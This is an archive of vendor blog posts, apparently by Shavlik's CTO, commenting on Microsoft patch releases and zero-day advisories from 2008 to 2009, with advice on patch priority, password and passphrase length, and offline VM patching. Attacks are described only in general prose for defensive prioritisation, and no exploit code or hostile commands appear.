|
|
Security Center
Resources
|
 Archive
 From the Desk of the CTOEric SchultzeHorseshoes and Hand Grenades Like the old saying goes, “Close only counts in horseshoes and hand grenades.” I’ve developed a corollary this week, “The 'number of flaws' only matters to VA scanners and journalists.” I’ve read many news releases this week talking about the record number of flaws/vulnerabilities that Microsoft fixed in the June '09 Patch Tuesday release. For the record, I’m saying 'Not Relevant'. Let’s take MS09-019 as an example. MS09-019 is a cumulative update for Microsoft Internet Explorer. The Microsoft bulletin details eight individual flaws that were addressed by the patches referenced in the security bulletin. Each flaw can be exploited in the same manner - visit an evil website and the evil website can run code on your system. And the closely related 'the evil code will run in the context of the currently logged on user'. As a Systems Administrator, one thing is clear to me: if my users visit an evil website, their machine's can be exploited. How do I rectify this? I can apply the suggested patch. Do I care that there were eight different underlying flaws that would lead to the evil code execution? No. Do I need to take eight different steps to protect myself from this vulnerability? No. Can I patch my systems to protect them from only 7 of the 8 vulnerabilities? No. What I do care about is the amount of effort required to protect my machines from this issue. That answer is '1'. 1 patch will protect me from these issues - whether there is only 1 listed flaw, or 17 listed flaws. One patch does the trick. Microsoft issued ten security bulletins covering some much larger number of flaws (I won't list that number here, because I can't be bothered to count something that is irrelevant). As a Systems Administrator, I should look at my maximum effort as something up to '10'. Some of the bulletins may be for products that don't impact me; therefore, the number could be somewhat lower. Some months, Microsoft has released more than 10 bulletins. That tells me more work is required. Other months, Microsoft has only released one bulletin - therefore seemingly less effort required to fix my systems then when 10 bulletins appear. If Microsoft only released one bulletin in a month, and that bulletin addressed 52 issues, does that mean it's almost twice as much effort to remediate my systems vs. a month that had 10 bulletins but a purported lower number of vulnerabilities? No. Could Microsoft manipulate the way that they call out the flaws in their bulletins? Sure. Does Microsoft list out all of the additional variants that they found internally when researching the externally reported flaw? No sir. This could hike the flaw numbers much higher. Could Microsoft combine like flaws into single reported flaws? Yes - though they'd need to appease the individuals who reported the items to them, so they each get their day in the sun. And how about those VA scanners? All of the above is irrelevant. I care about the number of patches. To that end, how many patches were released on the June 2009 patch day? Have any journalists mentioned this? Not that I've seen. The number of patches released is, at the end of the day, a better reflection of the amount of effort required to make your company secure. I frequently hear people ask "how many patches did Microsoft release today?" and the answer is something along the lines of "10 today". No, this is the number of security bulletins released. The number of patches is something else entirely. For June 2009, Microsoft released 64 unique security bulletin-related patches. This includes English x86 and x64 (but not ia64.) 362 meg, if you care to know. (multi-national organizations need to multiply the number of patches by the number of languages they manage) Worst case, I have a subset of up to 64 different patches to apply to each of my systems. The tough part is figuring out which ones go to which systems. Those companies that do patch management by hand are in a world of hurt - there's no way to manage each of these by hand. But I digress... Let's start a new trend - let's talk about the true numbers on patch day - those that reflect the actual level of effort - not those that allow journalists to go for sensationalism or help Mozilla justify themselves vs. Microsoft. Reflections on June 2009 Patch Day Microsoft released 10 security bulletins this month. Eight of the ten were assigned exploitability indices of '1 - Consistent Exploit Code Likely'. This means hackers could have access to exploit code fairly soon - which means the patches should be installed sooner rather than later. Five of the ten security bulletins discuss 'server-side' vulnerabilities (vs. client-side vulnerabilities). More on server-side vs. client-side in a future post. See the end of this post for recommendations on which to install first. MS09-018: Vulnerabilities in Active Directory Could Allow Remote Code Execution (971055) For the attack to be successful against Windows 2000 DCs, the attacker simply needs to target their attack against LDAP ports (tcp 389, 636, 3268, or 3269). While these ports are traditionally blocked at Internet firewalls, these ports are wide open for attack on most internal networks. The attacker doesn't need any special authentication to attack Windows 2000 servers. Once they launch the code, they can take any action they wish against the domain controller. If I were the attacker, I'd go after the SAM database that contains all of the Domain User's password hashes. For Windows Server 2003, the attack is somewhat mitigated in that the attacker must have some level of credentials to the domain controller. In most instances, this means the attacker must be a member of the domain which he or she is attacking. The vulnerability is rated Important in WS03 as it doesn't allow code execution - it just jams up the server from doing what it should. I'd recommend patching Windows 2000 AD servers as soon as possible. I'd also patch Windows Server 2003 systems quickly, as you don't want disgruntled employees launching the tool of the week to down your domain controllers. MS09-019: Cumulative Security Update for Internet Explorer (969897) The IE8 issue impacts Windows XP systems when browsing evil Internet websites. Vista and WS08 systems are protected against evil Internet sites because of DEP and ASLR built-in protections. Vista systems can be vulnerable to evil Intranet sites if other security configs on the Vista box have been weakened. In any event, it's nice that this zero-day flaw in IE8 has been corrected. Go apply the patch. The remaining issues addressed in the bulletin impact IE versions 5, 6 and 7. Exploitation can range from information disclosure to what Microsoft calls remote code execution (and I call local code execution). Workaround: don't visit evil websites. This is a client-side collection of vulnerabilities as they require someone at the target system to take an action on the machine in order to allow the vulnerabilities to execute. Therefore, this attack is more likely to impact your end-user workstations than your datacenter servers. MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) While this vulnerability doesn't allow the attacker to write files to or execute code on the server, it might allow them to read enough information from the server that they can exploit other services on the box (think SQL server). See my prior post, New Microsoft IIS Zero-Day Vulnerability, on this issue for more information. MS09-021: Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (969462) The Excel 2000 platform is rated as Critical, whereas Excel 2002-2007, SharePoint, and Excel converters are rated Important. Excel 2000 is rated Critical because it lacks the open dialog confirmation window that exists in later releases. This means if you have Excel 2000 installed and you visit an evil web page, the web page can open Excel and launch the evil document without your knowledge. You're hacked. In Excel 2002 and later, the evil document wouldn't open automatically; rather, it would prompt you if you wish to open the file. If the evil file does execute, it runs under the context of the currently logged on user (typical of a client-side vulnerability). MS09-022: Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution (961501) In this instance, the attacker can execute code on Windows 2000 systems remotely; however, the attacker must first install a print server on their own machine, then send RPC packets to the target system, instructing the target to connect to the rogue print server. When the target system enumerates the sharename of the rogue server, the attacker's code can execute on the remote system. Windows XP and later systems aren't vulnerable to this attack; however, they are vulnerable to several other attacks. In the first, a locally logged on user can read or print any file on the system, even if they don't have access to the file. The local attacker can specify the file they want to read as a separator page - thus allowing it to be viewed. The second attack is a privilege escalation attack. The attacker can send RPC packets to the target system, convincing it to load an evil printdriver dll. Once this happens, the attacker can execute code on the system. In order for this to happen the attacker must have the 'manage printers' capability (which is granted to locally logged on users). For Windows 2000, this is a Critical issue. For Vista and WS08, this is Important. For XP and WS03 systems, this is rated Moderate. MS09-023: Vulnerability in Windows Search Could Allow Information Disclosure (963093) If this evil file is indexed by the search engine (whether it be an email message, document, or data file) AND appears at the top of a search result (performed by the user) html script embedded in the evil file can execute on the target system. The attacker's script could access data on the system and forward this back to the attacker. Alternatively, if the evil file is not returned at the top search result, the script will still execute if the user selects and previews the search result for the evil file. The above scenario is seemingly complex - probably what helped to get it rated Moderate rather than Important. Also, Windows Search is not installed on these platforms by default. If you're a hacker looking to read data on a system, I'd look to other exploits before attempting this one. Windows Search has had two prior security updates: MS09-015 and MS08-075. MS09-024: Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution (957632) The code will execute with the same level of permissions as the currently logged on user (administrator, in many cases) and can do anything the logged on user can do. This patch replaces MS08-072 for Works 8.5. MS09-025: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537) While this exploit might be most beneficial to (the few) computer users who don't have admin permissions to their local systems, the exploit can also be leveraged by folks who do terminal services to remote computers, and in some cases, to users who have code upload capabilities to hosted web servers. Because it requires that the user have some level of access to execute code on the target system, Microsoft has rated this Important. Microsoft also says that proof of concept code has been released for several of the vulnerabilities addressed by this patch. This patch replaces MS09-006 (which was Critical). MS09-026: Vulnerability in RPC Could Allow Elevation of Privilege (970238) In order to pull off this attack, a remote attacker would need to send carefully constructed packets to a vulnerable RPC service on the target machine. Third party apps can choose any tcp or udp ports to use for their services - it's not as easy as saying tcp 139 or 445. Third party services that implement tight authentication and security over their RPC services are less likely to be susceptible to exploitation. To be sure that you're safe, install this patch and ask your vendors if they include any code that looks like the examples here: http://tinyurl.com/nsoqn6. MS09-027: Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (969514) Recommended order of deployment: First: MS09-018 (Win2K), MS09-019 (IE), MS09-020 (IIS) After: all the rest Disclaimer: adjust these recommendations for the assets on your network 7 is still better than 8, but passphrases are best I wrote up the below in response to a question on a newsgroup about the best password length. It's an old topic, but still very relevant. See my original piece here: http://www.securityfocus.com/infocus/1319 For Windows minimum password length, the difference between 7 and 8 is computationally negligible these days. 8 characters creates two halves of a LanMan hash (which is still created by default, both on servers and workstations). Enforcing an eight character complex password means users will typically put the special character (*&^%$) as the last character. (And many users will only create the minimal length password.) That leaves the first seven characters as alpha-numeric - which can be cracked with a small character set in a password cracker. The eighth character is then the special character, which is the first character in the second LanMan hash - so it will crack instantly in password cracker. You've then compromised a complex password of 8 characters in a matter of minutes. If the password minimum length is seven, most users will make theirs seven, which means the special character is within the first 7 (probably last, but that doesn't matter) which means in order to crack the LanMan hash, you'd need to run the cracker with the entire character set (not just alphanumeric) over the entire 7 character range - which will take a long time. Using this analogy, a seven character complex password will usually be tougher to crack than an 8-12 character complex password. If you insist upon using 8, then make sure to set the registry key on all desktops, servers, and domain controllers to not create the LanMan hash. Then, run some of the freeware tools available to delete all existing LanMan hashes from the password history (as they can be used to help guess what the current password is). Better yet, enforce a minimum of 15 characters. You should still run a tool to delete all the old password hashes just to be safe. With a 15 character password, it won't save the LM hash, so it will be much tougher to crack. I've done an experiment in the classroom on password length (before Steve Riley wrote an article on this - no offense Steve!). I ask each person on one side of the classroom to pick a password. They think up a password - one they would typically use at work. Don't say it, just think of it. Then I ask people on the other side of the classroom to think of a passphrase. Don't say it out loud- just think of it. I ask the first side of the room (password) to count the length of the password they thought of - and I ask the others (passphrase) to count the length of their passphrase. The first side of the room is usually sitting between 7 and 13 characters long. The second side of the classroom is anywhere from 20 to 60 characters long (rarely shorter than 15). Asking users to think of passwords as 'passphrases' is a really good way to encourage long password length. It's usually easier for a user to remember their passphrase, and it's easy for them to change it next month (they can simply change a word or value in their phrase.) A good passphrase usually includes one or more spaces in the phrase - that helps with the special character (how many people put spaces in their passwords? not many...) Therefore, if you want to go with a minimum less than 15, use 7, else do 15+ and educate folks about the coolness of the passphrase. Just don't use 8. (See my article here - why 7 is better than 8: http://www.securityfocus.com/infocus/1319) New Microsoft IIS Zero-Day Vulnerability Today (May 19, 2009) Microsoft released a security advisory for Microsoft IIS Servers. This flaw can enable attackers to read sensitive files on the webserver by submitting a specially crafted URL to the IIS server. This is only the third vulnerability we've seen in IIS since October of 2004 (last issues were Feb 2008 and July 2006) - IIS has been pretty secure over the last few years (unlike the years 2000-2004 where we saw numerous bulletins, patches, and exploitations such as code red and nimda). This flaw appears to me much more serious for customers running IIS 5 (Windows 2000) because the vulnerable WebDAV services are running by default. IIS6 (Windows Server 2003) doesn't enable WebDAV by default. It is unclear what level of access may be granted to an attacker via this exploit as it all depends on how the webserver has been configured and how the file system security has been applied to the data on the webserver. In a default configuration (and I would gather most installations), this flaw might allow the attacker to read certain files on the webserver, but would not allow them to write any files. If the attacker us unable to write any files to the webserver, it's far less likely that the attacker can upload or execute any malicious code on the server or gain additional levels of access to the server. One note of caution - this flaw could enable attackers to read code pages on the webserver, where these pages might include usernames or passwords for applications or databases controlled by the webserver. Shavlik recommends people running IIS5 or IIS6 run the IIS Lockdown and URLScan tools from Microsoft. Both of these tools disable WebDAV and will protect your system from this latest zero day. Microsoft releases patch for Powerpoint 0-day flaw Microsoft patched all Windows versions of Powerpoint today - addressing both a 0-day flaw and 13 other privately reported security vulnerabilities. The 0-day vulnerability enabled attackers to take over client machines if a user opened a malformed powerpoint document or visited an evil website. The attacker would be able to execute code on the user's machine with the same level of permissions afforded to the logged on user. (If the user was logged on as an administrator, the evil code could execute as admin. If the user was logged on as a user-level account, then the evil code could only execute with user permissions and not admin permissions). April 2009 Patch Day – Spring Cleaning A slew of Microsoft updates this month - Eight bulletins released: 5 Critical, 2 Important, and 1 Moderate. While eight patches is a larger number than in recent months, this month's release includes fixes for a number of issues that Microsoft previously identified as too laborious\complex to fix. This includes fixes for the Safari Carpet Bombing and SearchPath issues, additional enhancements for credential reflection (ala SMBRelay fix in MS08-068), and Service Isolation issues as called out at a 2008 security conference. Microsoft had previously stated that each of these issues were either too complex to solve or didn't represent actual vulnerabilities. It's enlightening to see that they've taken a second look at each of these topics and have found solutions to address each. In probably their most ambitious patch to date, Microsoft even pulled developers off of Windows 7 to assist with the creation of the MS09-012 patch (discussed below). We can only hope that Microsoft continues in this vein and re-examines other parts of the Operating System that were thought too complex to fix. Gory details below... Microsoft knocked off patches MS09-009 and MS09-010 for several outstanding 0-day issues, including fixes for Excel (advisory 968272 from February 09) and WordPad\Office (advisory 960906 from December 08). Users should install these patches right away because exploits for these issues have been circulating on the Internet for several months. On to the good stuff: 1. Starting with the Carpet Bombing fixes: Microsoft has released two patches to deal with this issue - an IE patch and an OS patch. MS09-014 is a cumulative IE patch that addresses 6 vulnerabilities - one of these being the carpet bomb fix. In this scenario, an attacker would force an evil file down to a user's desktop (through the initial release of the Apple Safari web browser). The evil file would be assigned a specific name - one that happened to match a normal Operating System file. When the user later opened Internet Explorer, IE would execute the evil 'system' file from the desktop rather than the similarly named (legitimate) file from system directory. MS09-014 solves this issue by removing the current working directory (in this case, the desktop) from the search path. When IE is launched, it will now look in the system path for the proper file rather than loading the illegitimate file from the desktop. The IE fix was accomplished by modifying two of the IE DLLs so that they don't look in the current working directory first (when loading other app DLLs). While this fix only modifies Internet Explorer, Microsoft exposed a registry key that users can modify if they want to make all of their applications ignore the current working directory: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Internet Explorer\Main\FeatureControl\ [FEATURE_ENABLESEARCHPATH_KB963027] "iexplore.exe"=dword:00000000 (spaces added in front of 'Internet' and 'FEATURE' to make for easier display - remove these spaces before setting this registry key) The second fix for the carpet bombing issue was released in MS09-015, an OS patch for XP and later systems. This patch does two things: 1. It modifies one system DLL (secur32.dll) that incorrectly searched for schannel.dll in the current working directory, and 2. It introduces a new API function that application developers can use in their code to use safe search functions. Those APIs are SetDllDirectory which removes current working directory from DLL loading, and SetSearchPathMode, which moves current working directory to the end of the directories searched by the SearchPath API. 2. The second issue addressed this month (and also requiring installation of two patches) address more avenues for credential reflection. Credential reflection was first addressed in MS08-068. That bulletin addressed a scenario where opening a malicious email or document, or viewing an evil website would send encrypted versions of your credentials (username and password) to the attacker. The attacker could then turn these around and 'replay' the encrypted credentials to gain access to your computer. The MS08-068 patch addressed this issue when the attack vector was using the SMB protocol. MS09-013 is an Operating System patch that solves the same problem but is specific for the winhttp connection engine (using http protocol). MS09-014 is the Internet Explorer patch (previously referenced re: the carpet bombing fix) that also includes a fix for the credentials reflection issue, but this time when using wininet (http protocol) as the underlying connection engine when IE is used for establishing authentication. In both credential reflection attacks, the attacker needs to have SMB access to the target system. The SMB access enables them to mount the registry and file system. Since the SMB protocol (tcp 139 ot tcp 445) is usually blocked at the Internet gateway/firewall, these attacks are more prone to execution on an internal corporate network. The MS09-014 wininet attack vector is worrisome in this environment, as Internet Explorer is configured by default to present credentials to remote systems when browsing in the Intranet zone. To prevent your machine from being mounted via a credential reflection attack, install MS08-068, MS09-013, and MS09-014. (This will prevent attack when your system was the one that originally sent credentials to the attacker. This will NOT prevent exploitation if matching credentials gathered from another system are reflected from that system to your system.) 3. The last, and most interesting patch, that I'll mention is MS09-012. This patch addresses 'Token Kidnapping'. Essentially, it helps prevent applications running as NetworkService or LocalService from escaping their sandboxes and running as LocalSystem. In short, it means 'better protection for your web and SQL servers'. Token Kidnapping is detailed in a new whitepaper by Cesar Cerrudo (http://www.argeniss.com/research/TokenKidnapping.pdf) and presented at last year's Hack in the Box conference (April 2008). By using impersonation functions, these services can execute code under a different context - where LocalSystem is the preferred context (as this has super-admin permissions). As a result, code can be executed with administrative rights. Any application that uses NetworkService or LocalService (and SeImpersonate) is susceptible to this attack. The most common attack vectors include IIS servers and SQL Servers. IIS 6 and 7 servers run under the NetworkService context and enable FullTrust to .NET applications by default, making it an ideal candidate for this kind of attack. This becomes a concern when we look at web servers where users are allowed to upload code to the server. The most common scenario is a multi-tenant webserver where an ISP is running websites for multiple customers on the same Server. Each customer is allowed to upload their web pages to their own website. If the customer uploads a specially crafted .aspx page, when that page is viewed - the .aspx page executes code as LocalSystem on the server. This can give the customer administrative access to the entire webserver - for example: allowing them access to all the websites on that server - not just their own site. From here, the customer (hacker) can access backend SQL databases or sensitive information, upload backdoors to the server, connect to other servers on the inside of ISP network, etc. Not good. Microsoft expended a great deal of effort in correcting this issue - even pulling developers off of Windows 7 to assist with this patch. Certain parts of the fix were backported from Vista and Windows Server 2008 (tokens) while brand new code had to be written for all Operating Systems (XP through 2008). As a result of the effort, the MS09-012 patch provides Service Isolation that mitigates the attacks identified by Cesar Cerrudo. Shavlik's recommended order of installation:
Server Systems:
Reflections on March 2009 Patch Day Three new security bulletins released today. All three of today's bulletins apply to the Operating System, though some apply to a smaller subset of machines, and each has a completely different impact on the end user experience (or lack of experience if you aren't exploited). The most Critical of today's patches is MS09-006 which could allow an attacker to take complete control of your computer if you view a website, email, or document that contains an evil graphic or picture. Also Critical (in my mind, though Microsoft rates it Important), is a set of patches for Windows DNS Servers. Attackers can leverage this flaw to redirect Internet traffic to look-alike websites in hopes of gathering sensitive user information. Lastly, Microsoft issued a patch to correct an issue where attackers can access restricted websites that require certificates, even though they don't have this certificate. I recommend installing MS09-006 and MS09-008 right away - and while you're at it, go ahead and install MS09-007 - that way you can install patches for all three vulnerabilities at the same time and leverage the same system reboot to complete the patch installation. Being OS patches, they should all be should be relatively simple to install. Microsoft did NOT release a patch for the Excel zero day vulnerability. Maybe we can expect this as an out of band patch later this month? Also, Adobe has just released a new version of Adobe Reader 9 to correct a zero day vulnerability that was previously announced. DETAILS While the common attack vector may be via images hosted on a website of questionable repute, the attack can also be spawned by viewing emails or documents with embedded images. Once again, don't open documents or emails from people you don't know. Don't rule out hacks spawned from evil images hosted on Facebook. This patch should be very safe to deploy and requires a reboot. Best to patch this first on machines where end-users exist - laptops, desktops, etc., then deploy to servers (where users are less likely to be reading emails, opening documents, or surfing the web.) This patch applies to all Operating Systems and replaces MS08-061 (a kernel patch), which itself replaces MS08-025 (an earlier kernel patch). MS09-007 is a seemingly innocuous spoofing vulnerability that can actually post great concern for certain types of users. This vulnerability can be used to connect to a website or resource that requires certificate-based authentication. Usually, this means that only users with the required certificate can access the site. However, in this scenario, an attacker could access the restricted site even though they don't have the necessary certificate. In order to pull this off, the attacker needs to have a copy of the site's public authentication certificate - which is something that is most easily obtained if the attacker has full access to the victim's computer (and if this is the case, far worse things can happen). Many users don't ever do anything with certificate-based authentication for secure sites. Those that do probably use an Active Directory based certificate store, which thwarts this attack. Those that do use local accounts and certificates are most at risk from this vulnerability and should install the patch right away. All others can roll it out as they see fit - though if you're rolling out MS09-006, just go ahead and roll this out at the same time and leverage the shared reboot. This vulnerability impacts all Operating Systems. The Patch supersedes the one released for MS07-031, which also addressed an schannel vulnerability. MS09-008 addresses a vulnerability in DNS and WINS services that could allow an attacker to insert bad data into a DNS (or WINS) Server, thereby redirecting people's traffic to potentially evil websites. The security bulletin doesn't list any workarounds, nor does it imply any pre-requisites on the part of the attacker, meaning it could be possible for a remote, unauthenticated attacker to modify a vulnerable DNS Server and redirect their site's users. Assuming this knowledge is correct, that would make this a Critical issue, rather than a severity if Important, in my eyes. The sole purpose of a DNS Server is to direct individuals to the proper end-location. If an unauthenticated remote attacker can modify these instructions and redirect people to bogus websites then the DNS Server isn't doing its job and should be considered compromised. That's a pretty serious situation - attackers can setup look-a-like websites hoping to entice users to enter sensitive information (though the redirection attack is thwarted by using SSL). Any way I look at it, this should be a Critical patch to install on all DNS Servers right away. (Maybe Microsoft rated this Important as the level of effort to pull of this attack is so great that the likelihood of exploitation is minimal? However, exploit code was released for an earlier, similar exploit.) A similar patch was released for WINS servers to handle a similar type of attack, though limited to the internal WINS Server and its network. This patch supersedes MS08-037 (a prior DNS Spoofing issue) and requires a reboot. Excel zero day flaw announced Microsoft released a security advisory today about a new Excel vulnerability. This vulnerability impacts all versions of Microsoft Excel from 2000 to 2007. In order to exploit a system, the attacker needs to entice the user to open a malformed Excel document. If this happens, the attacker can then take any action on the target system under the context of the logged on user. If the logged on user is an administrator, then the attacker can do anything they wish on the system (delete files, reformat the hard drive, steal information from the system, etc.). If the logged on user is a ‘user’ on the system (and not admin), then the attacker has fewer options on the box (read data accessible to the end user, delete data written by the end user, etc.). Microsoft is researching the issue and will probably create a patch to fix the issue. This is not unlike any other Microsoft Office vulnerability, except in this instance, knowledge of the vulnerability has been made public before a patch is available. Shavlik encourages users not to open Excel documents from unknown senders or locations. Zero Day vulnerability in Adobe Reader and Adobe Acrobat A security vulnerability was recently identified in two Adobe products that could allow attackers to take complete control of your system. Opening a malformed PDF document could allow unintended code to execute without the knowledge of the local user. The evil code could do anything on the system, up to the level of access given to the currently logged on user. Security researchers are seeing limited, targeted attacks in the wild. In most instances, the evil PDF file will crash the Adobe application, and in some instances may try and entice users to install a malicious anti-spyware application. Adobe intends to patch their PDF products starting on March 11, 2009. Until the patch is released, users may protect themselves by disabling JavaScript in their Adobe applications. However, recent research indicates that even this workaround (disabling JavaScript) does not prevent exploitation of this vulnerability. More info here: The official Adobe response here: Reflections on February 2009 Patch Day A seemingly light batch of patches this month, trailing an even lighter, single patch release in January. Two Critical items released - including patches for Internet Explorer 7 and Microsoft Exchange Server. Additionally, two Important items released - for Microsoft SQL Server and Visio. MS08-067 OOB Patch - Conficker - Downadup worm AV vendor F-Secure estimates that over 8 million systems have been infected with a variant of the Conficker worm known as 'Downadup'. This worm leverages the security vulnerability addressed by the Microsoft out-of-band patch MS08-067 released in October 2008. More information, and an official apology, on MS09-001 I've received queries from press, end users, and vendors about my commentary on patch Tuesday and would like to take this time to provide some background on what lead to my comments as well as a slightly tempered position on the patch itself. On patch Tuesday, I read the 09-001 bulletin. Upon reading about the issue I immediately got a bad feeling about it. Unauthenticated exploitation via SMB protocol is really bad. Prior history shows that this can lead to really evil things, including events similar to blaster and sasser. Our PR firm was hounding me to push out commentary to the press, so I gave them what I knew (see below). My commentary was spot on - at least with as much as was what written in the security bulletin itself (http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx). It wasn't until a few hours later when I was able to catch my breath and do further perusal that I stopped by to view Microsoft's short version of the security bulletins for January (http://www.microsoft.com/technet/security/bulletin/ms09-jan.mspx). In this spot, they include the exploitability index for each of the bulletins released during the month. For MS09-001, they rated it a '3 - functioning exploit code unlikely'. They also included a link to a blog post with more information (http://blogs.technet.com/swi/archive/2009/01/09/ms09-001-prioritizing-the-deployment-of-the-smb-bulletin.aspx) In this blog post, Microsoft explains that the likelihood of exploitation is mitigated by the vast amount of information that the attacker must have about a particular machine in order to exploit that machine using the 09-001 vulnerability. Specifically, they say, "Controlling what data is overwritten is difficult. To exploit this type of kernel buffer overrun, an attacker typically needs to be able to predict the layout and contents of memory. The memory layout of the targeted machine will depend on various factors such as the physical characteristics (RAM, CPUs) of the system, system load, other SMB requests it is processing, etc." Had I read this before I released my patch commentary, I would have modified my comments to say, "This is potentially a very bad flaw - but Microsoft has assured us that the knowledge required to exploit this is quite high, is unlikely to be available to the attacker, and even in those cases where the information can be obtained, the ability to actually get exploitable code is infinitesimally small, therefore the risk on this should be considered as something lower than the 'Critical' rating which Microsoft has assigned." I would have continued on to say, "Unauthenticated SMB flaws are similar in nature to what was exploited in the Blaster and Sasser worms. While these ports are usually blocked on Internet firewalls and personal firewalls, these ports are typically left open in a corporate network. If a worm is released, and that worm makes it into a corporate network, it will make swiss cheese of that network relatively quickly. Fortunately, it appears that the likelihood of a worm for this vulnerability is very low." And if I was feeling particularly fiesty, I would also ask, "Why doesn't Microsoft include the exploitability index in the bulletin itself? Why must I visit other variants of the bulletin to obtain this information, and then a third location to read details that tell me that the Critical issue of which I was alerted probably isn't that Critical after all? Make it easy - include the Exploitability Index in the bulletin!" So here's my official apology for crying wolf on this issue when I should have done my due diligence and read all three Microsoft locations before offering my opinion on this issue. That being said... you should still get this patch installed on your systems. MS09-001 MS09-001 is a super critical patch to install right away. This vulnerability is similar to what prompted the blaster and sasser worms a few years ago. We expect to see a worm released for this in the very near future. This flaw enables an attacker to send evil packets to a Microsoft computer and take any action they desire on that computer - no credentials required. The only pre-requisite for this attack to be successful is a connection from the attacker to the victim over the NetBIOS (File and Printer Sharing) ports (tcp 139 or 445). By default, most computers have these ports turned on. While these ports are usually blocked on Internet firewalls and personal firewalls, these ports are typically left open in a corporate network. If a worm is released, and that worm makes it into a corporate network, it will make swiss cheese of that network relatively quickly. MS08-078 Emergency IE patch Microsoft's latest IE out of band patch release needs to be installed right away. The number of infected websites is growing at an alarming rate - even people visiting legitimate websites are getting hacked with this exploit. Patch it now - just do it. Why did this come out as an out of band release? It looks like Microsoft was informed of the IE zero day at the same time as everyone else – namely, last Tuesday (patch Tuesday). Based on Microsoft MSRC blog posts, starting on Tuesday, Microsoft studied the exploit and reviewed source code and determined that it impacted all versions of IE. From that point on, it can be assumed that Microsoft has been working quickly on a patch for all versions of IE. Microsoft had to determine how serious the issue was – as that gave them guidance as to whether or not to release an out of band patch or wait until the next monthly cycle. By late last week, Microsoft was aware that this issue was starting to infect user’s systems at a faster rate than they’ve seen with past zero day exploits. Specifically, attackers were loading the exploit on legitimate websites so that even users who visit only non-nefarious websites might also get infected. Based on this level of data, it’s my belief that Microsoft decided the issue warranted an out of band patch release. Researching, fixing, testing, and releasing a security patch within an eight day window is an incredible feat – especially given the need to support all versions of IE across all platforms and languages. This is an ‘all hands on deck’ response from Microsoft – I don’t think we’ll see this as the norm for less critical patches in the future as it is quite disruptive to their own processes. Now, it’s equally as important for customers to roll out this patch to all of their systems as soon as possible. I’d bet you a cookie that many companies can’t get it rolled out as quickly as Microsoft got it built. Internet Explorer Zero Day Mass Hysteria An article was posted online today at a tech publication that mentions the Internet Explorer zero-day vulnerability and includes suggestions from un-named security experts to 'switch to an alternative internet browser, such as Firefox or Google Chrome.' Yes, an unpatched security vulnerability exists in Internet Explorer. Yes, it's being actively exploited on the Internet, and Yes, even visiting legitimate websites can lead to compromise*. No, this isn't very different than previously announced zero day exploits (except we're seeing a wider distribution of the exploit and more machines being hacked.) No, the world isn't coming to an end, and No, you don't need to change your browser. ZDNet security bloggers are claming that Microsoft is on target to release an out-of-band security patch for this IE issue as early as tomorrow (December 17th). When it is released, install the patch. Until then, read the workarounds posted by Microsoft to help protect yourself from this issue. While you're at it, install all the other security patches that may be missing on your system. One unpatched issue on your system is equal to a zero-day flaw that may be exploited on the Internet. Unless you're fully patched, you're not patched at all. * Hackers are planting the exploit on non-nefarious websites via SQL injection techniques. This means that visiting supposedly safe websites can lead to compromise via this IE flaw. These 'legit' websites have even bigger issues, as this means attackers were able to exploit poor SQL coding practices on these sites that enables hackers to inject evil code on the websites. December 2008 patch day Microsoft has released 8 security bulletins today, 6 of which are rated Critical. However, it's the non Critical patches that are more interesting this month - we'll get to those in a minute. Microsoft offline virtual patching not really 'offline' Microsoft has released an updated version of what they call their 'offline virtual machine servicing tool'. This tool is intended to aid administrators in patching Microsoft Virtual Machines that are currently offline (turned off). Microsoft makes a good case for the need to patch offline VM images - something that Shavlik has been saying for quite a while: "Offline machines do not automatically receive operating system, antivirus, or application updates that would keep them compliant with current IT policy. An out-of-date virtual machine may pose a risk to the IT environment. If deployed and started, the out-of-date virtual machine might be vulnerable to attack or could be capable of attacking other network resources. Therefore, IT groups must take measures to ensure that offline virtual machines remain up-to-date and compliant." Microsoft states that their solution can patch the offline images. If you look deeper at their solution, however, you find that this isn't really the case. As Microsoft continues: "At present, these measures involve temporarily bringing the virtual machine online, applying the necessary updates, and then storing it again." Wow. This isn't offline patching. This is called 'online patching'. The Microsoft solution moves the offline image to another server, launches the image (turns it on), has the image checking with a WSUS or SCCM server, performs an online patch assessment and an online patch copy and deployment. When done, it turns the image off and moves it back to the original image repository. How is this offline patching? Rather than leveraging efficiencies gained from evaluating the offline image, the Microsoft solution requires the administrator to launch each of the VM images, scan them, patch them, and turn them off. This requires CPU and memory for each VM, additional servers, storage, and networks to move and launch the VM in a private network, and more time to launch the VM before it can even be assessed. According to Microsoft's documentation, their solution "brings groups of virtual machines online just long enough for them to receive updates from either System Center Configuration Manager 2007 or Windows Server Update Services. As soon as the virtual machines are up-to-date, the tool returns them to the offline state in the Virtual Machine Manager library." By contrast, the Shavlik solution doesn't require the VM images to be turned on in order to perform a patch assessment. The Shavlik engine scans the offline image when it is turned off - a true offline solution. Shavlik's scan function doesn't require that the image be moved to another system or network and doesn't require that the image be turned on. This approach saves both time and hardware and allows for scanning a much larger number of images in less time. Additionally, the Shavlik solution can scan and patch many more applications (both Microsoft and third party) than Microsoft’s WSUS and SCCM solution. As an IT administrator, I'd prefer to understand the patch status before I turn on the image. I'd also like to prep all the patches for installation on the image before turning it on. Then, when I do turn on the image, the patches can install right away. By copying the patches to the system when it's offline, we've eliminated the time needed to download the patches to each image after it's turned on. To protect unpatched systems from being hacked when turned on (and before patch installation) the administrator can launch the VM images in a 'network disconnected' state. Once the patches have been installed and the system rebooted, it can be joined back to the network. (Microsoft accomplishes this protection by launching the VM image on a private internal network.) Future versions of Shavlik's solution will automate the 'network disconnection' process when launching the VM image in order to install the patches. Shavlik's solution is unique in the marketplace. I'm not aware of any other solution (aside from VMware's solution which leverages Shavlik's scan engine) that can truly perform patch assessment and prep deployment against offline VM images. Reflections on the November 2008 Microsoft patch release Two security bulletins released today. One Critical, one rated Important. I find the 'Important' bulletin far more interesting this month. From what I can tell, it appears that MS08-068 (Important) is addressing a vulnerability that was first made public 7+ years ago (in 2001). Sir Dystic, from Cult of the Dead Cow, found a vulnerability in Microsoft Operating Systems that enabled attackers complete access to user's computers. He wrote a utility called SMBRelay to demonstrate the flaw. Microsoft was aware of the issue but didn't issue any security bulletins or patches to correct the behavior. 